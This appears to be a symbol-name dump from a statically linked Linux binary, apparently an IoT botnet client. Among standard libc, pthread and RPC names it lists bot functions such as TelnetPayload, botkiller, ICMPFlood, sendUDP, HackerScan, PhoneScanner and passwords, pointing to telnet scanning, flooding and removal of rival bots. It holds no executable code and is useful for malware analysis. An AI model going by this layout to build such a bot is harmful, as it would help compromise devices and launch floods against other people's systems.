__libc_tsd_RPC_VARS_data
__GI_getgid
srandom_r
__GI_fputs
xdr_char
_init
__GI_setrlimit
clnt_pcreateerror
D1ckSucka
__GI_inet_ntoa_r
hostname_to_ip
__GI_setstate_r
pthread_attr_setstackaddr
parseHex
strtol
__sigsetjmp
pipe
__libc_lseek64
__GI_pthread_getschedparam
_svcauth_unix
strnlen
rawmemchr
__GI_mempcpy
accept
__libc_allocate_rtsig
pthread_getschedparam
__GI___C_ctype_b_data
__libc_pread64
__GI_xdr_replymsg
__GI_lrand48_r
__sigaddset
__GI_xdr_authunix_parms
pthread_setcancelstate
xdr_union
__pthread_functions
nanosleep
__GI_send
__pthread_wait_for_restart_signal
xdr_enum
h_errno
calloc
__GI_svcerr_auth
xdr_bool
__pthread_mutex_unlock
wait4
__GI_exit
__app_fini
setrlimit
csum
__GI_xdr_long
__exit_cleanup
xdr_wrapstring
xdr_rejected_reply
__GI___rpc_thread_createerr
__GI_execl
__GI_srandom_r
pthread_condattr_destroy
__GI___ctype_tolower
pthread_attr_setscope
write
__rpc_thread_variables
environ
__GI_close
xdr_free
getBuild
xdr_netobj
Server_Botport
fprintf
__resolv_lock
kill
fputs_unlocked
__pthread_mutex_trylock
__pthread_destroy_specifics
svc_register
xdr_long
pthread_mutexattr_setkind_np
TelnetPayload2
__GI_svcerr_decode
__GI_brk
bind
_svcauth_short
__GI_nanosleep
__GI_strtok
svcerr_systemerr
_stdio_openlist
__GI_sigprocmask
inet_addr
ntohl
__GI_fseek
__pthread_nonstandard_stacks
__GI_clntudp_bufcreate
__GI___libc_open64
pthread_cond_broadcast
pthread_once
__deregister_frame_info
__pthread_once_fork_child
ourIP
chdir
pthread_attr_setinheritsched
__pthread_alt_lock
pmap_unset
__pthread_manager_adjust_prio
fseeko
_stdio_openlist_del_count
connectTimeout
__pthread_manager_thread
__pthread_setconcurrency
setsockopt
xdr_short
bsd_signal
fseek
pthread_setschedparam
__GI_kill
__GI_strcmp
svc_getreqset
__GI_memmove
sendSTD
setstate
__decode_dotted
__GI_pthread_cond_broadcast
__pthread_perform_cleanup
HackaShit
__stdio_READ
pthread_key_create
memchr
__GI_toupper
__pthread_initialize_minimal
__GI_recv
svc_getreq_poll
__stdin
stdin
__GI_clnt_sperrno
__new_sem_wait
wait
xdr_accepted_reply
__GI_isatty
__libc_open64
pthread_setconcurrency
sem_init
svcerr_weakauth
xdr_authunix_parms
__pthread_mutex_destroy
__pthread_mutexattr_getkind_np
__pthread_handles_num
strcasestr
_start
sem_close
__GI_xdr_opaque_auth
strstr
__GI_ioctl
xdr_u_longlong_t
init_rand
rand
pthread_kill
signal
read
__GI_xdr_int
__pthread_manager_request
__pthread_internal_tsd_get
__decode_header
pread64
__linuxthreads_pthread_sizeof_descr
pthread_attr_setstacksize
__GI___h_errno_location
xdr_u_char
__GI_memcpy
sendmsg
strcoll
clntudp_create
__GI_xdr_callhdr
wcsrtombs
_stdio_user_locking
__pthread_internal_tsd_address
__cmsg_nxthdr
__GI_svcerr_noprog
__GI_sigdelset
strncpy
strcasecmp
htonl
sendto
__exit_count
xdr_u_long
__C_ctype_toupper
__GI_open64
sched_get_priority_max
__GI___C_ctype_b
xdr_replymsg
pthread_sigmask
realloc
on_exit
__libc_siglongjmp
__pthread_compare_and_swap
__GI_gethostbyname_r
__GI_pthread_cond_signal
__GI_strncpy
TelnetPayload
__libc_send
PhoneScanner
__GI___xpg_strerror_r
__pthread_attr_setstackaddr
__GI___C_ctype_tolower
__GI_recvfrom
pthread_cond_init
__GI_getrlimit
bcopy
__GI_strcpy
__GI_inet_ntop
strtok
__GI___fputc_unlocked
sigfillset
memcmp
svcerr_noprog
sched_get_priority_min
__stdio_adjust_position
xdr_opaque
_vfprintf_internal
__GI_poll
__GI_nrand48_r
__GI_strcasestr
fork
__pthread_restart
__GI_pthread_attr_setschedpolicy
pthread_mutexattr_getpshared
__GI_pthread_attr_setinheritsched
__stdio_rfill
strncat
__GI_pthread_attr_getscope
__GI_bindresvport
__libc_pause
sem_trywait
__GI_sleep
__GI_gethostbyname
sigaction
_dl_phdr
__pthread_mutexattr_init
__GI_svc_sendreply
__GI_getc_unlocked
__GI___libc_fcntl64
__uClibc_init
xdr_callhdr
__GI_munmap
_store_inttype
__length_dotted
__getpagesize
__GI_random
__syscall_error
__uclibc_progname
__GI_getegid
__GI_wait4
__uClibc_main
sbrk
__rtld_fini
__GI_svcerr_progvers
__GI_fork
strdup
__libc_close
__pthread_internal_tsd_set
__GI_getpid
inet_aton
pthread_condattr_getpshared
index
_pthread_cleanup_push_defer
processCmd
__sigismember
gettimeofday
fopen
__bss_start
__GI_pthread_self
__libc_open
getOurIP
get_telstate_host
memset
__GI_socket
main
__GI___libc_lseek
__glibc_strerror_r
__GI_sigfillset
__rpc_thread_clnt_cleanup
listFork
__GI_xdr_union
__GI___C_ctype_tolower_data
__stdio_fwrite
negotiate
srand
__rpc_thread_svc_pollfd
initstate
fclose
__GI_pthread_attr_setscope
__syscall_rt_sigaction
open64
xdr_string
ntohs
pthread_mutexattr_settype
sendUDP
inet_ntoa
getppid
tcgetattr
__C_ctype_tolower_data
__libc_recvfrom
time
__pthread_threads_events
__libc_system
__GI_abort
pthread_mutexattr_setpshared
poll
__GI_pthread_cond_wait
__GI_pthread_cond_init
__GI_pthread_cond_destroy
__GI_xdr_u_short
xdr_u_int
fdpopen
__GI_fprintf
pthread_attr_getdetachstate
__pthread_last_event
__get_hosts_byname_r
__stdio_init_mutex
__GI__exit
botkiller
herror
__libc_recvmsg
strcmp
pthread_mutex_unlock
callrpc
advances2
__nameserver
data_start
HackerScan
_seterr_reply
__rpc_thread_svc_fdset
__pthread_manager_reader
__pthread_initial_thread
__h_errno_location
__GI_putc_unlocked
__GI___rpc_thread_svc_pollfd
matchPrompt
__C_ctype_b_data
__GI_inet_pton
gethostbyname
_stdio_fopen
__GI_xdr_u_hyper
__GI_pthread_setschedparam
_fini
__GI_xdr_opaque
__GI_chdir
authnone_create
__vfork
__GI_mmap
__malloc_sbrk_lock
__GI_xdr_array
sprintf
__pthread_offsetof_descr
__new_sem_trywait
fdgets
msync
strerror_r
__GI_ffs
__GI_select
__libc_waitpid
__pthread_unlock
__libc_multiple_threads
sem_open
socket_connect
__GI_xdr_bool
__rpc_thread_destroy
__GI_waitpid
__GI_xdr_u_int
__GI_xdr_enum
__GI_vfprintf
_stdio_term
__decode_answer
__GI_signal
__pthread_attr_setguardsize
stderr
fails
__pthread_exit_requested
__pthread_attr_getguardsize
__pthread_manager_thread_tos
__GI_pthread_exit
vfork
__C_ctype_b
__pthread_once_fork_parent
srandom
ICMPFlood
_ppfs_setargs
__GI_sendto
__GI_sigemptyset
__GI_printf
__libc_fork
sigismember
__atexit_lock
scanPid
__linuxthreads_reap_event
fsync
rand_cmwc
__pthread_manager
__libc_lseek
findARandomIP
__GI_xprt_unregister
clnt_sperror
__GI_pmap_set
__pthread_getconcurrency
__pthread_alt_timedlock
advances
__libc_fcntl64
_pthread_cleanup_push
pread
pthread_self
pthread_setcanceltype
getsockopt
__GI_fseeko64
__pthread_once_fork_prepare
pthread_mutexattr_init
hstrerror
__libc_wait
fflush_unlocked
__stdio_wcommit
__exit_slots
HackerPrint
contains_string
__GI___fgetc_unlocked
__nameservers
fwrite_unlocked
inet_ntoa_r
__pagesize
_stdio_openlist_add_lock
__GI_getdtablesize
__GI_recvmsg
__GI_pthread_attr_getschedpolicy
__drand48_iterate
access
_edata
__stdout
__GI_memrchr
__GI_fflush_unlocked
__GI_xdr_u_long
__GI_strstr
__searchdomains
_end
bindresvport
phone
__pthread_threads_max
htons
pthread_mutex_destroy
svc_fdset
__rpc_thread_createerr
_sigintr
_ppfs_prepargs
__GI_strspn
fgetc_unlocked
initstate_r
pthread_mutex_lock
__GI_svc_getreq_common
PhoneScan
__new_sem_getvalue
__GI_connect
__curbrk
sem_getvalue
__libc_poll
pthread_cond_wait
_dl_phnum
__GI_pthread_equal
_fpmaxtostr
svc_unregister
__errno_location
__pthread_timedsuspend
uppercase
__GI_pmap_getport
_stdlib_strto_l
__GI___libc_open
exit
__stdio_WRITE
_stdio_init
pthread_attr_setguardsize
__GI_geteuid
__GI_sendmsg
__heap_alloc
sigdelset
inet_ntop
pthread_mutex_trylock
__GI_pthread_setcancelstate
_null_auth
pthread_atfork
__C_ctype_toupper_data
_dl_aux_init
__GI_perror
__libc_sendmsg
_errno
_authenticate
__GI_gettimeofday
atoi
_stdio_openlist_del_lock
pthread_cond_destroy
__GI_inet_aton
pthread_attr_setschedpolicy
__GI_svc_getreq_poll
fgets_unlocked
__pthread_mutexattr_getpshared
__GI_bind
_exit
szprintf
__pthread_timedsuspend_new
__pthread_sig_cancel
__GI_xdr_void
__GI_lseek
__pthread_sig_restart
strspn
__pthread_offsetof_pid
__libc_recv
__pthread_main_thread
pthread_mutex_init
__pthread_cleanup_pop_restore
__libc_creat
__pthread_attr_getstacksize
strlen
__GI___cmsg_nxthdr
lseek64
open
clone
xdr_array
toupper
__libc_write
_ppfs_parsespec
__GI_strtol
__GI_getuid
__GI_strtok_r
__GI_errno
__fork
__libc_sendto
__stdio_trans2w_o
__GI_vfork
__GI__authenticate
strchr
__GI_rawmemchr
__GI_srand48_r
fputs
svc_max_pollfd
__GI_raise
pthread_attr_setschedparam
__data_start
__pthread_sizeof_handle
__pthread_provide_wrappers
setsid
__GI_inet_addr
__GI_svc_unregister
__GI_pthread_condattr_init
rpc_createerr
__libc_msync
__encode_dotted
__GI_strnlen
_Jv_RegisterClasses
macAddress
__pthread_threads_debug
pthread_attr_setdetachstate
recvmsg
fputc_unlocked
svc_pollfd
__libc_sigsuspend
__GI_xdr_hyper
fcntl
__GI_xdr_bytes
sched_yield
pthread_join
__GI__rpc_dtablesize
pthread_getconcurrency
read_with_timeout
__GI_atoi
fseeko64
pthread_cond_timedwait
__GI_sprintf
clntudp_bufcreate
__ctype_tolower
__register_frame_info
__GI_svc_getreqset
__GI_pthread_attr_getinheritsched
sigwait
wcrtomb
__GI_getsockname
__GI___rpc_thread_svc_max_pollfd
pwrite
close
__libc_connect
passwords
pthread_attr_getschedparam
srand48_r
__GI_strlen
pids
vfprintf
strpbrk
pthread_setspecific
xdr_int
xdr_hyper
sigsuspend
_load_inttype
rangechoice
raise
useragents
clnt_sperrno
free
xdr_u_short
sigprocmask
__fputc_unlocked
__GI_authnone_create
getsockname
__GI_xdr_short
